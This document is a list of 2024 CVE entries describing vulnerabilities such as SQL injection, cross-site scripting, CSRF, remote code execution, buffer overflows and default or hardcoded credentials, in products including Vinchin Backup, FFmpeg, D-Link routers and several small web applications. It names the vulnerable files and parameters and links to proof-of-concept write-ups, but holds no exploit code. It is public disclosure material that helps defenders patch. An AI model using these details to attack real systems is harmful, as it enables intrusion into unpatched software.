CVE 2024 22911 Candidate A stack-buffer-underflow vulnerability was found in SWFTools v0.9.2, in the function parseExpression at src/swfc.c:2602. MISC:https://github.com/matthiaskramm/swftools/issues/216 Assigned (20240111)
CVE 2024 2291 Candidate In Progress MOVEit Transfer versions released before 2022.0.11 (14.0.11), 2022.1.12 (14.1.12), 2023.0.9 (15.0.9), 2023.1.4 (15.1.4), a logging bypass vulnerability has been discovered. An authenticated user could manipulate a request to bypass the logging mechanism within the web application which results in user activity not being logged properly. MISC:https://community.progress.com/s/article/MOVEit-Transfer-Service-Pack-March-2024 | URL:https://community.progress.com/s/article/MOVEit-Transfer-Service-Pack-March-2024 | MISC:https://www.progress.com/moveit | URL:https://www.progress.com/moveit Assigned (20240307)
CVE 2024 22903 Candidate Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the deleteUpdateAPK function. MISC:http://vinchin.com | MISC:https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/ | MISC:https://seclists.org/fulldisclosure/2024/Jan/32 Assigned (20240111)
CVE 2024 22902 Candidate Vinchin Backup & Recovery v7.2 was discovered to be configured with default root credentials. MISC:http://default.com | MISC:http://vinchin.com | MISC:https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/ | MISC:https://seclists.org/fulldisclosure/2024/Jan/31 Assigned (20240111)
CVE 2024 22901 Candidate Vinchin Backup & Recovery v7.2 was discovered to use default MYSQL credentials. MISC:http://vinchin.com | MISC:https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/ | MISC:https://seclists.org/fulldisclosure/2024/Jan/30 Assigned (20240111)
CVE 2024 22900 Candidate Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the setNetworkCardInfo function. MISC:http://vinchin.com | MISC:https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/ | MISC:https://seclists.org/fulldisclosure/2024/Jan/29 Assigned (20240111)
CVE 2024 22899 Candidate Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the syncNtpTime function. MISC:http://vinchin.com | MISC:https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/ | MISC:https://seclists.org/fulldisclosure/2024/Jan/29 Assigned (20240111)
CVE 2024 22895 Candidate DedeCMS 5.7.112 has a File Upload vulnerability via uploads/dede/module_upload.php. MISC:https://github.com/zzq66/cve5 Assigned (20240111)
CVE 2024 22894 Candidate An issue fixed in AIT-Deutschland Alpha Innotec Heatpumps V2.88.3 or later, V3.89.0 or later, V4.81.3 or later and Novelan Heatpumps V2.88.3 or later, V3.89.0 or later, V4.81.3 or later, allows remote attackers to execute arbitrary code via the password component in the shadow file. MISC:https://github.com/Jaarden/AlphaInnotec-Password-Vulnerability/ | MISC:https://github.com/Jaarden/CVE-2024-22894 Assigned (20240111)
CVE 2024 22891 Candidate Nteract v.0.28.0 was discovered to contain a remote code execution (RCE) vulnerability via the Markdown link. MISC:https://github.com/EQSTLab/PoC/tree/main/2024/RCE/CVE-2024-22891 Assigned (20240111)
CVE 2024 22889 Candidate Due to incorrect access control in Plone version v6.0.9, remote attackers can view and list all files hosted on the website via sending a crafted request. MISC:https://github.com/shenhav12/CVE-2024-22889-Plone-v6.0.9 Assigned (20240111)
CVE 2024 22877 Candidate StrangeBee TheHive 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case reporting functionality. This feature allows an attacker to insert malicious JavaScript code inside the template or its variables, that will be executed in the context of the TheHive application when the HTML report is opened. MISC:https://github.com/StrangeBeeCorp/Security/blob/main/Security%20advisories/SB-SEC-ADV-2023-001.md Assigned (20240111)
CVE 2024 22876 Candidate StrangeBee TheHive 5.1.0 to 5.1.9 and 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case attachment functionality which enables an attacker to upload a malicious HTML file with Javascript code that will be executed in the context of the The Hive application using a specific URL. The vulnerability can be used to coerce a victim account to perform specific actions on the application as helping an analyst becoming administrator. MISC:https://github.com/StrangeBeeCorp/Security/blob/main/Security%20advisories/SB-SEC-ADV-2023-002.md Assigned (20240111)
CVE 2024 22873 Candidate Tencent Blueking CMDB v3.2.x to v3.9.x was discovered to contain a Server-Side Request Forgery (SSRF) via the event subscription function (/service/subscription.go). This vulnerability allows attackers to access internal requests via a crafted POST request. MISC:http://blueking.com | MISC:http://tencent.com | MISC:https://gist.github.com/exp1orer/0f190c6a64b668a9b1c4c47789affa09 | MISC:https://sphenoid-enquiry-9be.notion.site/BK-CMDB-SSRF-ba21e94f4976460188fa52d26c15a6ae?pvs=4 Assigned (20240111)
CVE 2024 22871 Candidate An issue in Clojure versions 1.20 to 1.12.0-alpha5 allows an attacker to cause a denial of service (DoS) via the clojure.core$partial$fn__5920 function. FEDORA:FEDORA-2024-270cd506bb | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YFPGUDXMW6OXKIDGCOZFEAXO74VQIB2T/ | FEDORA:FEDORA-2024-91dab41dfa | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/25FKUOYXQZGGJMFUM5HJABWMIX2TILRV/ | FEDORA:FEDORA-2024-f7745a5990 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SWWK2SO2MH4SXPO6L444MM6LHVLVFULV/ | MISC:https://hackmd.io/@fe1w0/rymmJGida Assigned (20240111)
CVE 2024 22862 Candidate Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the JJPEG XL Parser. MISC:https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=62113 | MISC:https://github.com/FFmpeg/FFmpeg/commit/ca09d8a0dcd82e3128e62463231296aaf63ae6f7 Assigned (20240111)
CVE 2024 22861 Candidate Integer overflow vulnerability in FFmpeg before n6.1, allows attackers to cause a denial of service (DoS) via the avcodec/osq module. MISC:https://github.com/FFmpeg/FFmpeg/commit/87b8c1081959e45ffdcbabb3d53ac9882ef2b5ce Assigned (20240111)
CVE 2024 22860 Candidate Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the jpegxl_anim_read_packet component in the JPEG XL Animation decoder. MISC:https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=61991 | MISC:https://github.com/FFmpeg/FFmpeg/commit/d2e8974699a9e35cc1a926bf74a972300d629cd5 Assigned (20240111)
CVE 2024 2286 Candidate The Sky Addons for Elementor (Free Templates Library, Live Copy, Animations, Post Grid, Post Carousel, Particles, Sliders, Chart) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wrapper link URL value in all versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047987%40sky-elementor-addons&new=3047987%40sky-elementor-addons&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3047987%40sky-elementor-addons&new=3047987%40sky-elementor-addons&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d5d0ccbd-a091-4897-a100-eac75ffa0e3b?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d5d0ccbd-a091-4897-a100-eac75ffa0e3b?source=cve Assigned (20240307)
CVE 2024 22859 Candidate ** DISPUTED ** Cross-Site Request Forgery (CSRF) vulnerability in livewire before v3.0.4, allows remote attackers to execute arbitrary code getCsrfToken function. NOTE: the vendor disputes this because the 5d88731 commit fixes a usability problem (HTTP 419 status codes for legitimate client activity), not a security problem. MISC:https://github.com/github/advisory-database/pull/3490 | MISC:https://github.com/livewire/livewire/commit/5d887316f2aaf83c0e380ac5e72766f19700fa3b Assigned (20240111)
CVE 2024 22857 Candidate zlog 1.2.16 has a heap-based buffer overflow in struct zlog_rule_s while creating a new rule that is already defined in the provided configuration file. A regular user can achieve arbitrary code execution. MISC:https://github.com/HardySimpson/zlog/ | MISC:https://github.com/HardySimpson/zlog/blob/1a7b1a6fb956b92a4079ccc91f30da21f34ca063/src/rule.h#L30 | MISC:https://www.cybersecurity-help.cz/vdb/SB2024022842 Assigned (20240111)
CVE 2024 22854 Candidate DOM-based HTML injection vulnerability in the main page of Darktrace Threat Visualizer version 6.1.27 (bundle version 61050) and before has been identified. A URL, crafted by a remote attacker and visited by an authenticated user, allows open redirect and potential credential stealing using an injected HTML form. MISC:https://tomekwasiak.pl/cve-2024-22854/ Assigned (20240111)
CVE 2024 22853 Candidate D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session. MISC:https://github.com/Beckaf/vunl/blob/main/D-Link/AC750/2/2.md | MISC:https://www.dlink.com/en/security-bulletin/ Assigned (20240111)
CVE 2024 22852 Candidate D-Link Go-RT-AC750 GORTAC750_A1_FW_v101b03 contains a stack-based buffer overflow via the function genacgi_main. This vulnerability allows attackers to enable telnet service via a specially crafted payload. MISC:https://github.com/Beckaf/vunl/blob/main/D-Link/AC750/1/1.md | MISC:https://www.dlink.com/en/security-bulletin/ Assigned (20240111)
CVE 2024 22851 Candidate Directory Traversal Vulnerability in LiveConfig before v.2.5.2 allows a remote attacker to obtain sensitive information via a crafted request to the /static/ endpoint. CONFIRM:https://www.liveconfig.com/de/kb/cve/cve-2024-22851/ | MISC:https://www.drive-byte.de/en/blog/liveconfig-advisory-cve-2024-22851 Assigned (20240111)
CVE 2024 2285 Candidate A vulnerability, which was classified as problematic, has been found in boyiddha Automated-Mess-Management-System 1.0. Affected by this issue is some unknown functionality of the file /member/member_edit.php. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-256052. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256052 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256052 | MISC:VDB-256052 | boyiddha Automated-Mess-Management-System member_edit.php cross site scripting | URL:https://vuldb.com/?id.256052 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/STORED%20XSS%20member-member-edit.php%20.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/STORED%20XSS%20member-member-edit.php%20.md Assigned (20240307)
CVE 2024 2284 Candidate A vulnerability classified as problematic was found in boyiddha Automated-Mess-Management-System 1.0. Affected by this vulnerability is an unknown functionality of the file /member/chat.php of the component Chat Book. The manipulation of the argument msg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256051. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256051 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256051 | MISC:VDB-256051 | boyiddha Automated-Mess-Management-System Chat Book chat.php cross site scripting | URL:https://vuldb.com/?id.256051 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/STORED%20XSS%20member-chat.php%20.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/STORED%20XSS%20member-chat.php%20.md Assigned (20240307)
CVE 2024 22836 Candidate An OS command injection vulnerability exists in Akaunting v3.1.3 and earlier. An attacker can manipulate the company locale when installing an app to execute system commands on the hosting server. MISC:https://akaunting.com/ | MISC:https://github.com/akaunting/akaunting/releases/tag/3.1.4 | MISC:https://github.com/u32i/cve/tree/main/CVE-2024-22836 Assigned (20240111)
CVE 2024 2283 Candidate A vulnerability classified as critical has been found in boyiddha Automated-Mess-Management-System 1.0. Affected is an unknown function of the file /member/view.php. The manipulation of the argument date leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256050 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256050 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256050 | MISC:VDB-256050 | boyiddha Automated-Mess-Management-System view.php sql injection | URL:https://vuldb.com/?id.256050 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/SQL%20Injection%20member-view.php%20.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/SQL%20Injection%20member-view.php%20.md Assigned (20240307)
CVE 2024 22824 Candidate An issue in Timo v.2.0.3 allows a remote attacker to execute arbitrary code via the filetype restrictions in the UploadController.java component. MISC:https://github.com/auntvt/Timo/issues/6 Assigned (20240111)
CVE 2024 2282 Candidate A vulnerability was found in boyiddha Automated-Mess-Management-System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php of the component Login Page. The manipulation of the argument useremail leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256049 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256049 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256049 | MISC:VDB-256049 | boyiddha Automated-Mess-Management-System Login Page index.php sql injection | URL:https://vuldb.com/?id.256049 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/SQL%20Injection%20Login.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/SQL%20Injection%20Login.md Assigned (20240307)
CVE 2024 22819 Candidate FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/email/email_templets_update. MISC:https://github.com/mafangqian/cms/blob/main/2.md Assigned (20240111)
CVE 2024 22818 Candidate FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerbility via /system/site/filterKeyword_save MISC:https://github.com/mafangqian/cms/blob/main/3.md Assigned (20240111)
CVE 2024 22817 Candidate FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/email/email_conf_updagte MISC:https://github.com/mafangqian/cms/blob/main/1.md Assigned (20240111)
CVE 2024 2281 Candidate A vulnerability was found in boyiddha Automated-Mess-Management-System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/index.php of the component Setting Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256048. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256048 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256048 | MISC:VDB-256048 | boyiddha Automated-Mess-Management-System Setting index.php access control | URL:https://vuldb.com/?id.256048 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/BROKEN%20ACCESS%20CONTROL%20.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/boyiddha%20utomated-Mess-Management-System/BROKEN%20ACCESS%20CONTROL%20.md Assigned (20240307)
CVE 2024 22795 Candidate Insecure Permissions vulnerability in Forescout SecureConnector v.11.3.06.0063 allows a local attacker to escalate privileges via the Recheck Compliance Status component. MISC:https://gist.github.com/Hagrid29/aea0dc35a1e87813dbbb7b317853d023 | MISC:https://github.com/Hagrid29/ForeScout-SecureConnector-EoP | MISC:https://www.forescout.com/ Assigned (20240111)
CVE 2024 22779 Candidate Directory Traversal vulnerability in Kihron ServerRPExposer v.1.0.2 and before allows a remote attacker to execute arbitrary code via the loadServerPack in ServerResourcePackProviderMixin.java. MISC:https://gist.github.com/apple502j/193358682885fe1a6708309ce934e4ed | MISC:https://github.com/Kihron/ServerRPExposer/commit/8f7b829df633f59e828d677f736c53652d6f1b8f | MISC:https://modrinth.com/mod/serverrpexposer Assigned (20240111)
CVE 2024 22778 Candidate HackMD CodiMD <2.5.2 is vulnerable to Denial of Service. MISC:https://github.com/hackmdio/codimd/issues/1846 Assigned (20240111)
CVE 2024 22776 Candidate Wallos 0.9 is vulnerable to Cross Site Scripting (XSS) in all text-based input fields without proper validation, excluding those requiring specific formats like date fields. MISC:https://github.com/ellite/Wallos | MISC:https://webity-luescher.notion.site/webity-luescher/Wallos-v0-9-to-v1-2-2-CVE-2024-22776-Stored-XSS-Vulnerability-in-all-text-based-input-fields-6622fb4cfbe0430aa0b1d4b3edcb67b0 Assigned (20240111)
CVE 2024 22773 Candidate Intelbras Roteador ACtion RF 1200 1.2.2 esposes the Password in Cookie resulting in Login Bypass. MISC:https://medium.com/@wagneralves_87750/poc-cve-2024-22773-febf0d3a5433 | MISC:https://www.youtube.com/watch?v=-r0TWJq55DU&t=7s Assigned (20240111)
CVE 2024 22772 Candidate Improper Input Validation in Hitron Systems DVR LGUVR-8H 1.02~4.02 allows an attacker to cause network attack in case of using defalut admin ID/PW. MISC:http://www.hitron.co.kr/firmware/ | URL:http://www.hitron.co.kr/firmware/ Assigned (20240111)
CVE 2024 22771 Candidate Improper Input Validation in Hitron Systems DVR LGUVR-4H 1.02~4.02 allows an attacker to cause network attack in case of using defalut admin ID/PW. MISC:http://www.hitron.co.kr/firmware/ | URL:http://www.hitron.co.kr/firmware/ Assigned (20240111)
CVE 2024 22770 Candidate Improper Input Validation in Hitron Systems DVR HVR-16781 1.03~4.02 allows an attacker to cause network attack in case of using defalut admin ID/PW. MISC:http://www.hitron.co.kr/firmware/ | URL:http://www.hitron.co.kr/firmware/ Assigned (20240111)
CVE 2024 2277 Candidate A vulnerability was found in Bdtask G-Prescription Gynaecology & OBS Consultation Software 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /Setting/change_password_save of the component Password Reset Handler. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-256046 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256046 | Bdtask G-Prescription Gynaecology & OBS Consultation Software Password Reset change_password_save cross-site request forgery | URL:https://vuldb.com/?id.256046 | MISC:VDB-256046 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.256046 | MISC:https://drive.google.com/file/d/1SVYLzbnYzSyun79QBOsRuWuMkzyjclJM/view?usp=drivesdk | URL:https://drive.google.com/file/d/1SVYLzbnYzSyun79QBOsRuWuMkzyjclJM/view?usp=drivesdk Assigned (20240307)
CVE 2024 22769 Candidate Improper Input Validation in Hitron Systems DVR HVR-8781 1.03~4.02 allows an attacker to cause network attack in case of using defalut admin ID/PW. MISC:http://www.hitron.co.kr/firmware/ | URL:http://www.hitron.co.kr/firmware/ Assigned (20240111)
CVE 2024 22768 Candidate Improper Input Validation in Hitron Systems DVR HVR-4781 1.03~4.02 allows an attacker to cause network attack in case of using defalut admin ID/PW. MISC:http://www.hitron.co.kr/firmware/ | URL:http://www.hitron.co.kr/firmware/ Assigned (20240111)
CVE 2024 2276 Candidate A vulnerability has been found in Bdtask G-Prescription Gynaecology & OBS Consultation Software 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /Venue_controller/edit_venue/ of the component Edit Venue Page. The manipulation of the argument Venue map leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256045 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256045 | Bdtask G-Prescription Gynaecology & OBS Consultation Software Edit Venue Page cross site scripting | URL:https://vuldb.com/?id.256045 | MISC:VDB-256045 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256045 | MISC:https://drive.google.com/file/d/11QliZKy-7ylKph1vwlXVHaRn5Jmk0Bjg/view?usp=drivesdk | URL:https://drive.google.com/file/d/11QliZKy-7ylKph1vwlXVHaRn5Jmk0Bjg/view?usp=drivesdk Assigned (20240307)
CVE 2024 22752 Candidate Insecure permissions issue in EaseUS MobiMover 6.0.5 Build 21620 allows attackers to gain escalated privileges via use of crafted executable launched from the application installation directory. MISC:https://github.com/hacker625/CVE-2024-22752 Assigned (20240111)
CVE 2024 22751 Candidate D-Link DIR-882 DIR882A1_FW130B06 was discovered to contain a stack overflow via the sub_477AA0 function. MISC:https://github.com/5erua/vuls/blob/main/dir882.md | MISC:https://www.dlink.com/en/security-bulletin/ Assigned (20240111)
CVE 2024 2275 Candidate A vulnerability, which was classified as problematic, was found in Bdtask G-Prescription Gynaecology & OBS Consultation Software 1.0. Affected is an unknown function of the component OBS Patient/Gynee Prescription. The manipulation of the argument Patient Title/Full Name/Address/Cheif Complain/LMP/Menstrual Edd/OBS P/OBS Alc/Medicine Name/Medicine Type/Ml/Dose/Days/Comments/Template Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256044. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256044 | Bdtask G-Prescription Gynaecology & OBS Consultation Software OBS Patient/Gynee Prescription cross site scripting | URL:https://vuldb.com/?id.256044 | MISC:VDB-256044 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256044 | MISC:https://drive.google.com/file/d/11QliZKy-7ylKph1vwlXVHaRn5Jmk0Bjg/view?usp=drivesdk | URL:https://drive.google.com/file/d/11QliZKy-7ylKph1vwlXVHaRn5Jmk0Bjg/view?usp=drivesdk Assigned (20240307)
CVE 2024 22749 Candidate GPAC v2.3 was detected to contain a buffer overflow via the function gf_isom_new_generic_sample_description function in the isomedia/isom_write.c:4577 MISC:https://github.com/gpac/gpac/issues/2713 | MISC:https://github.com/hanxuer/crashes/blob/main/gapc/01/readme.md Assigned (20240111)
CVE 2024 2274 Candidate A vulnerability, which was classified as problematic, has been found in Bdtask G-Prescription Gynaecology & OBS Consultation Software 1.0. This issue affects some unknown processing of the file /Home/Index of the component Prescription Dashboard. The manipulation of the argument Title leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256043. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256043 | Bdtask G-Prescription Gynaecology & OBS Consultation Software Prescription Dashboard Index cross site scripting | URL:https://vuldb.com/?id.256043 | MISC:VDB-256043 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256043 | MISC:https://drive.google.com/file/d/11QliZKy-7ylKph1vwlXVHaRn5Jmk0Bjg/view?usp=drivesdk | URL:https://drive.google.com/file/d/11QliZKy-7ylKph1vwlXVHaRn5Jmk0Bjg/view?usp=drivesdk Assigned (20240307)
CVE 2024 22729 Candidate NETIS SYSTEMS MW5360 V1.0.1.3031 was discovered to contain a command injection vulnerability via the password parameter on the login page. MISC:https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md Assigned (20240111)
CVE 2024 22727 Candidate Teltonika TRB1-series devices with firmware before TRB1_R_00.07.05.2 allow attackers to exploit a firmware vulnerability via Ethernet LAN or USB. MISC:https://teltonika-networks.com/newsroom/critical-security-update-for-trb1-series-gateways Assigned (20240111)
CVE 2024 22725 Candidate Orthanc versions before 1.12.2 are affected by a reflected cross-site scripting (XSS) vulnerability. The vulnerability was present in the server's error reporting. MISC:https://orthanc.uclouvain.be/hg/orthanc/file/Orthanc-1.12.2/NEWS | MISC:https://orthanc.uclouvain.be/hg/orthanc/rev/505416b269a0 Assigned (20240111)
CVE 2024 22724 Candidate An issue was discovered in osCommerce v4, allows local attackers to bypass file upload restrictions and execute arbitrary code via administrator profile photo upload feature. MISC:https://github.com/osCommerce/osCommerce-V4/issues/62 | MISC:https://medium.com/@cupc4k3/oscommerce-v4-rce-unveiling-the-file-upload-bypass-threat-f1ac0097880c Assigned (20240111)
CVE 2024 22723 Candidate Webtrees 2.1.18 is vulnerable to Directory Traversal. By manipulating the "media_folder" parameter in the URL, an attacker (in this case, an administrator) can navigate beyond the intended directory (the 'media/' directory) to access sensitive files in other parts of the application's file system. MISC:https://cupc4k3.medium.com/cve-2024-22723-webtrees-vulnerability-uncovering-sensitive-data-through-path-traversal-7442e7a38b68 Assigned (20240111)
CVE 2024 22720 Candidate Kanboard 1.2.34 is vulnerable to Html Injection in the group management feature. MISC:https://cupc4k3.medium.com/html-injection-vulnerability-in-kanboard-group-management-d9fe5154bb1b Assigned (20240111)
CVE 2024 2272 Candidate A vulnerability classified as critical was found in keerti1924 Online-Book-Store-Website 1.0. This vulnerability affects unknown code of the file /home.php of the component HTTP POST Request Handler. The manipulation of the argument product_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256042 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256042 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256042 | MISC:VDB-256042 | keerti1924 Online-Book-Store-Website HTTP POST Request home.php sql injection | URL:https://vuldb.com/?id.256042 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/Blind%20SQL%20Injection%20%20Home/Blind%20SQL%20Injection%20Home.php%20.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/Blind%20SQL%20Injection%20%20Home/Blind%20SQL%20Injection%20Home.php%20.md Assigned (20240307)
CVE 2024 22715 Candidate Stupid Simple CMS <=1.2.4 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin-edit.php. MISC:https://github.com/RumblingIsOccupied/cms/blob/main/1.md Assigned (20240111)
CVE 2024 22714 Candidate Stupid Simple CMS <=1.2.4 is vulnerable to Cross Site Scripting (XSS) in the editing section of the article content. MISC:https://github.com/RumblingIsOccupied/cms/blob/main/2.md Assigned (20240111)
CVE 2024 2271 Candidate A vulnerability classified as critical has been found in keerti1924 Online-Book-Store-Website 1.0. This affects an unknown part of the file /shop.php of the component HTTP POST Request Handler. The manipulation of the argument product_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256041 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256041 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256041 | MISC:VDB-256041 | keerti1924 Online-Book-Store-Website HTTP POST Request shop.php sql injection | URL:https://vuldb.com/?id.256041 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/Blind%20SQL%20Injection%20%20Shop/Blind%20SQL%20Injection%20Shop.php%20.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/Blind%20SQL%20Injection%20%20Shop/Blind%20SQL%20Injection%20Shop.php%20.md Assigned (20240307)
CVE 2024 22705 Candidate An issue was discovered in ksmbd in the Linux kernel before 6.6.10. smb2_get_data_area_len in fs/smb/server/smb2misc.c can cause an smb_strndup_from_utf16 out-of-bounds access because the relationship between Name data and CreateContexts data is mishandled. MISC:https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.6.10 | MISC:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d10c77873ba1e9e6b91905018e29e196fd5f863d Assigned (20240111)
CVE 2024 2270 Candidate A vulnerability was found in keerti1924 Online-Book-Store-Website 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /signup.php. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256040. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256040 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256040 | MISC:VDB-256040 | keerti1924 Online-Book-Store-Website signup.php cross site scripting | URL:https://vuldb.com/?id.256040 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/StoredXSS%20Signup/Stored%20XSS%20signup.php%20.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/keerti1924%20Online-Book-Store-Website/StoredXSS%20Signup/Stored%20XSS%20signup.php%20.md Assigned (20240307)
CVE 2024 22699 Candidate FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/admin/update_group_save. MISC:https://github.com/biantaibao/cms/blob/main/1.md Assigned (20240111)
